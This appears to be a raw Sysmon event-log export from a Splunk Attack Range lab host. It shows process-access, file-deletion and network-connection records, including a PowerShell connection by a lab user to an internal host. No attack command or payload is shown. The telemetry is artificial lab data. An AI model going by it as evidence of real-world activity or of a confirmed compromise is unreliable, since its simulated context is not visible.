18:15:28.803{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F40-613A-6190-03000000C801}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:28.803{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
354300x800000000000000035085419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:05.118{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56730-false10.0.1.12-8000- 23542300x800000000000000035085421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:42.839{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B38835937EE77C145F2EFE968E7B5B67,SHA256=82EAE366A167C00DAB36332EE4A19124C0358A41E1AEA5D70DA0AE683A081978,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.873{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3805B007B5DF1F5AD8B938F5BD1E586,SHA256=CDC9CD966200700AE33CDF819011D647F3CE5302752FE536B082FB2F0C4DC744,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.736{B81B27B7-4F4F-613A-6390-03000000C801}61044580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F4F-613A-6390-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:43.574{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4F4F-613A-6390-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:43.574{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F4F-613A-6390-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.559{B81B27B7-4F4F-613A-6390-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035085423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:08.331{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56731-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.321{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EB06017A91CA69258D560DDDC9C083E1,SHA256=11178CEC133ECFF5EF5E9E6267D0D6E3E80FC9C31B413065EFECDAD88BCE13CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F50-613A-6590-03000000C801}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:44.941{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:44.941{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:44.941{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F50-613A-6590-03000000C801}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F50-613A-6590-03000000C801}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.936{B81B27B7-4F50-613A-6590-03000000C801}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6396495B517138D8173F6A06303DFC15,SHA256=27D144C8B52CF16B82DF41B9B00E3204A4065A35C979FD15B6C01A77392B26B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29390A4474E6FCBD66257930D9E0FD8B,SHA256=227E2D41CB2E2D47054E09F7A59BF3C58000E87CA3666A4C344C361E54052EA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD3383D5E1FDEEDB6AC9DC0072DFF885,SHA256=B92A95BE5FF582081249AA344C4C8CF24A34A775EE5510D933F78A68F5A7F28C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.441{B81B27B7-4F50-613A-6490-03000000C801}51362996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.273{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F50-613A-6490-03000000C801}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:44.273{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 